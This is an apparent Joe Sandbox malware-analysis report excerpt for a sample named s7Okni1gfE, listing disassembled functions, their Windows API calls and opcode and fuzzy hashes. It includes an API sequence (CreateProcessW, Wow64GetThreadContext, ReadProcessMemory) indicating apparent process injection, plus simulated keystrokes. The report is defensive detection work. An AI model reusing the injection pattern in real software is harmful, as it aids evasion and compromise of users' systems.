                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                            • String ID:
                                            • API String ID: 3902256705-0
                                            • Opcode ID: 31b36b94331ea3bda0f8ee7ae240f8ae9c07bedbfe65a18921856f0403c6b38f
                                            • Instruction ID: 8b7a1acc3df4b5cf1d155511ec04b8c8b67bc0e7890bd0c162cce086b38f4cd6
                                            • Opcode Fuzzy Hash: 31b36b94331ea3bda0f8ee7ae240f8ae9c07bedbfe65a18921856f0403c6b38f
                                            • Instruction Fuzzy Hash: 95F0A43110422EA7DB04BF9CE9019DE77EDFF01354F704125FA09D2182DBB096D497A6
                                            Function 008235E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            • __lock_file.LIBCMT ref: 00823629
                                              • Part of subcall function 00824E1C: __lock.LIBCMT ref: 00824E3F
                                            • __fclose_nolock.LIBCMT ref: 00823634
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                            • String ID:
                                            • API String ID: 2800547568-0
                                            • Opcode ID: efa93577ab6179507090d8906e525b419d83dfa7891e655630fd82809f303b9b
                                            • Instruction ID: 0fa9b8d5dfb72755d3364dbebde6a4f17f46280a593b2c70aab53b328125912b
                                            • Opcode Fuzzy Hash: efa93577ab6179507090d8906e525b419d83dfa7891e655630fd82809f303b9b
                                            • Instruction Fuzzy Hash: D3F0BB71901234ABD7117B79A80276E76E4FF50334F258109E465FB3C1D77C8AC1AB56
                                            Function 011B1DBD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 011B257B
                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 011B2611
                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 011B2633
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1483155707.00000000011B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_11b0000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                            • String ID:
                                            • API String ID: 2438371351-0
                                            • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                            • Instruction ID: 21d3af5741024894dec8a2accd6519da7a657138d954bab89ca59babc454f300
                                            • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                            • Instruction Fuzzy Hash: A612DD20E24658C6EB24DF64D8507DEB232EF68300F1090E9D10DEB7A5E77A5E85CF5A
                                            Function 00822957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                            Download Yara Rule
                                            APIs
                                            • __flush.LIBCMT ref: 00822A0B
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __flush__getptd_noexit
                                            • String ID:
                                            • API String ID: 4101623367-0
                                            • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                            • Instruction ID: d974e063e3a48dffa14937088fded3b703d901201f779bb185e79b3593541cc4
                                            • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                            • Instruction Fuzzy Hash: 29419371600736BFDF288E69E8819AE7BA6FF45360B24852DE856C7640EA70DDC18B41
                                            Function 0081ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                            • Instruction ID: b3707f7c87a7f62b1bc98f1c99f2ef718251607f1e54b3c16b176954247c3526
                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                            • Instruction Fuzzy Hash: FA31C974A00109DBD718DF5CE4809A9FBBAFF49344B6486A5E80ACB255DB31EDC1CB90
                                            Function 00879A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ClearVariant
                                            • String ID:
                                            • API String ID: 1473721057-0
                                            • Opcode ID: b73d1a468819525f53dadce574c54229049e45cb64c1daa9e073992468bca9a4
                                            • Instruction ID: 60b6329c8923b5825c1e172161fcfc6b7d4c0fdfb8cac8dd2adfe4c2af806d67
                                            • Opcode Fuzzy Hash: b73d1a468819525f53dadce574c54229049e45cb64c1daa9e073992468bca9a4
                                            • Instruction Fuzzy Hash: 3E415E705046118FDB24DF18C484B5ABBE1FF85308F19895CE99A8B762C772E885CF52
                                            Function 008041A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00804214: FreeLibrary.KERNEL32(00000000,?), ref: 00804247
                                            • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008039FE,?,00000001), ref: 008041DB
                                              • Part of subcall function 00804291: FreeLibrary.KERNEL32(00000000), ref: 008042C4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Library$Free$Load
                                            • String ID:
                                            • API String ID: 2391024519-0
                                            • Opcode ID: f05c6f9951fe375c783d2a18b61a9192ebfa04e6f33c8c8eb3a0a1f436de8ad9
                                            • Instruction ID: ebf286b5ee6a966deed4f73b89c072e8614ffa817a3cd8c78dcec0db18b241d8
                                            • Opcode Fuzzy Hash: f05c6f9951fe375c783d2a18b61a9192ebfa04e6f33c8c8eb3a0a1f436de8ad9
                                            • Instruction Fuzzy Hash: 3611C471740306AADB10BB68DC06F9E77A9FF40700F108829F696E61C2DF74DA049B61
                                            Function 00879B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ClearVariant
                                            • String ID:
                                            • API String ID: 1473721057-0
                                            • Opcode ID: bb5d42657e3427e5510e4174683573713046f37b051fb9440f1fb59c890076e1
                                            • Instruction ID: 3281e21b7877e6834ed4796252ce3a273f57b635df7c801ecc07418cfc39e428
                                            • Opcode Fuzzy Hash: bb5d42657e3427e5510e4174683573713046f37b051fb9440f1fb59c890076e1
                                            • Instruction Fuzzy Hash: B6212770508705CFDB24DF68C844A5ABBE5FF84344F148A68F69A8B662C771E885CF52
                                            Function 0082AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • ___lock_fhandle.LIBCMT ref: 0082AFC0
                                              • Part of subcall function 00827BDA: __getptd_noexit.LIBCMT ref: 00827BDA
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __getptd_noexit$___lock_fhandle
                                            • String ID:
                                            • API String ID: 1144279405-0
                                            • Opcode ID: 14c7e4ebf6ed1d0dbfda94c0bcf735839eedd3760d1e82f6f86fb926bd9a593b
                                            • Instruction ID: d52cf9b3b52c88a06298ffb56c8525a6b1095b2d17839059db1beb09244b840f
                                            • Opcode Fuzzy Hash: 14c7e4ebf6ed1d0dbfda94c0bcf735839eedd3760d1e82f6f86fb926bd9a593b
                                            • Instruction Fuzzy Hash: 0E11B672815A348FD7126FA8B8017593BA0FF41335F154250E470DF1E2D7B48DD08B62
                                            Function 008039DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                            • Instruction ID: 7a47e6938b2abb7ea5ce241c0a1e78954849c3a16c407ce23bdd66dc08baef6c
                                            • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                            • Instruction Fuzzy Hash: 6E011D7154010DEECF45EFA8CC928EEBB78FB20344F108069A566D61E5EA309A89DB61
                                            Function 00822AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                            Download Yara Rule
                                            APIs
                                            • __lock_file.LIBCMT ref: 00822AED
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __getptd_noexit__lock_file
                                            • String ID:
                                            • API String ID: 2597487223-0
                                            • Opcode ID: 5b73e5b3eedc889086a40f2df592db504b45a2a570ee565af6b8d338bf42d80b
                                            • Instruction ID: cef0991f32ffac75dde4673b7c99e1a823677bfcf1d77a4f3ebcbaae0344b1b8
                                            • Opcode Fuzzy Hash: 5b73e5b3eedc889086a40f2df592db504b45a2a570ee565af6b8d338bf42d80b
                                            • Instruction Fuzzy Hash: 1EF0C231500235BBDF21AF7CAC027DF3AA1FF00320F554425B415DA191D7788AE2DB52
                                            Function 00804252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                            Download Yara Rule
                                            APIs
                                            • FreeLibrary.KERNEL32(?,?,?,?,?,008039FE,?,00000001), ref: 00804286
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: a47b655470a3a7b92a5b512d371dbedb50b2b834325074c12bfaea640a42180c
                                            • Instruction ID: bfcb80d94cc7683492bc12b3e77076a3332aff4629ea5b4ea6c085892cdd7976
                                            • Opcode Fuzzy Hash: a47b655470a3a7b92a5b512d371dbedb50b2b834325074c12bfaea640a42180c
                                            • Instruction Fuzzy Hash: 2DF015B1645712CFCB749F64E894816BBE5FF0432A3249A6EF2D6C2660C7329880DB50
                                            Function 008040A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008040C6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: LongNamePath
                                            • String ID:
                                            • API String ID: 82841172-0
                                            • Opcode ID: f7a8047365589a08f2080bfe9334f7d38eb50dc2f2396903e81508ac6e3e2c47
                                            • Instruction ID: e8601965854c9d5a3bf3b7af8193682f95e01a3a3a3a0b3bedaa63e3eb7ef347
                                            • Opcode Fuzzy Hash: f7a8047365589a08f2080bfe9334f7d38eb50dc2f2396903e81508ac6e3e2c47
                                            • Instruction Fuzzy Hash: AEE0CD366002345BC711A65CDC46FEA77ADEF8C6A0F050075F905D7254D96499C18791
                                            Function 011B2DC0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNELBASE(000001F4), ref: 011B2DD1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1483155707.00000000011B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_11b0000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                            • Instruction ID: 5dc966e48dee2ca496b87e5cd400b995919cc26e94ab42cdab98a5752fc61c14
                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                            • Instruction Fuzzy Hash: 32E0E67494010DDFDB00EFB4D9496EE7FB4EF04301F100261FD01D2281D7309D508A62

                                            Non-executed Functions

                                            Function 0086F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081B34E: GetWindowLongW.USER32(?,000000EB), ref: 0081B35F
                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0086F87D
                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0086F8DC
                                            • GetWindowLongW.USER32(?,000000F0), ref: 0086F919
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0086F940
                                            • SendMessageW.USER32 ref: 0086F966
                                            • _wcsncpy.LIBCMT ref: 0086F9D2
                                            • GetKeyState.USER32(00000011), ref: 0086F9F3
                                            • GetKeyState.USER32(00000009), ref: 0086FA00
                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0086FA16
                                            • GetKeyState.USER32(00000010), ref: 0086FA20
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0086FA4F
                                            • SendMessageW.USER32 ref: 0086FA72
                                            • SendMessageW.USER32(?,00001030,?,0086E059), ref: 0086FB6F
                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0086FB85
                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0086FB96
                                            • SetCapture.USER32(?), ref: 0086FB9F
                                            • ClientToScreen.USER32(?,?), ref: 0086FC03
                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0086FC0F
                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0086FC29
                                            • ReleaseCapture.USER32 ref: 0086FC34
                                            • GetCursorPos.USER32(?), ref: 0086FC69
                                            • ScreenToClient.USER32(?,?), ref: 0086FC76
                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0086FCD8
                                            • SendMessageW.USER32 ref: 0086FD02
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0086FD41
                                            • SendMessageW.USER32 ref: 0086FD6C
                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0086FD84
                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0086FD8F
                                            • GetCursorPos.USER32(?), ref: 0086FDB0
                                            • ScreenToClient.USER32(?,?), ref: 0086FDBD
                                            • GetParent.USER32(?), ref: 0086FDD9
                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0086FE3F
                                            • SendMessageW.USER32 ref: 0086FE6F
                                            • ClientToScreen.USER32(?,?), ref: 0086FEC5
                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0086FEF1
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0086FF19
                                            • SendMessageW.USER32 ref: 0086FF3C
                                            • ClientToScreen.USER32(?,?), ref: 0086FF86
                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0086FFB6
                                            • GetWindowLongW.USER32(?,000000F0), ref: 0087004B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                            • String ID: @GUI_DRAGID$F
                                            • API String ID: 2516578528-4164748364
                                            • Opcode ID: 0ff628aeaa37b0d8ba66c2fbc303e9cd78ec475907f398210682b837b5df27f2
                                            • Instruction ID: ff0b3667b0bb952bfbd349add2b3731d28bfc3b370304bde23062725213a3348
                                            • Opcode Fuzzy Hash: 0ff628aeaa37b0d8ba66c2fbc303e9cd78ec475907f398210682b837b5df27f2
                                            • Instruction Fuzzy Hash: 0032A970604345AFDB20CF68D884FAABBA9FF49358F050669F699C72A2D731DC50CB52
                                            Function 0086AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0086B1CD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: %d/%02d/%02d
                                            • API String ID: 3850602802-328681919
                                            • Opcode ID: f58bb012d5e096389af7a4a7e5a66f40b44d21e54bc2166d800fbedee3e8ffac
                                            • Instruction ID: 1719dde87502277fd524a7c72157e9e8c5fcd5b6febe9a4020c1e0c9df6b6d0b
                                            • Opcode Fuzzy Hash: f58bb012d5e096389af7a4a7e5a66f40b44d21e54bc2166d800fbedee3e8ffac
                                            • Instruction Fuzzy Hash: 0012CEB1500248ABEB289F68CC49FAE7BB8FF45314F114119FA15EB2D1DB748981CF52
                                            Function 0081EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetForegroundWindow.USER32(00000000,00000000), ref: 0081EB4A
                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00873AEA
                                            • IsIconic.USER32(000000FF), ref: 00873AF3
                                            • ShowWindow.USER32(000000FF,00000009), ref: 00873B00
                                            • SetForegroundWindow.USER32(000000FF), ref: 00873B0A
                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00873B20
                                            • GetCurrentThreadId.KERNEL32 ref: 00873B27
                                            • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00873B33
                                            • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00873B44
                                            • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00873B4C
                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00873B54
                                            • SetForegroundWindow.USER32(000000FF), ref: 00873B57
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00873B6C
                                            • keybd_event.USER32(00000012,00000000), ref: 00873B77
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00873B81
                                            • keybd_event.USER32(00000012,00000000), ref: 00873B86
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00873B8F
                                            • keybd_event.USER32(00000012,00000000), ref: 00873B94
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00873B9E
                                            • keybd_event.USER32(00000012,00000000), ref: 00873BA3
                                            • SetForegroundWindow.USER32(000000FF), ref: 00873BA6
                                            • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00873BCD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
